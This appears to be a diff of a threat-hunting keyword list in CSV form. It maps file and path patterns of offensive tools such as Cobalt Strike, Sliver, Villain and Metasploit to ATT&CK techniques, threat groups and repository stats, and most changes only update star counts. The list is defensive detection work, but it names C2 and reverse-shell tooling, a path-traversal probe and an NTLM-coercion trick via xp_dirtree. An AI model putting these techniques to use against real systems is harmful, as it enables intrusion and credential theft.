T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*.sites.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*.smtp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ssl.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*.stage.123456.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "*.static.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.status.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
@@ -2509,12 +2509,12 @@ "*.txt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.unconstrained.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.videos.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse 
shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*.vpn.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.webmail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.wiki.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation 
OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" "*.xls.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xls.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xls.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -2533,18 +2533,19 @@ "*.xlsx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xp_dirtree *\*","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/#kali-installer-images*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/.aggressor.prop*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
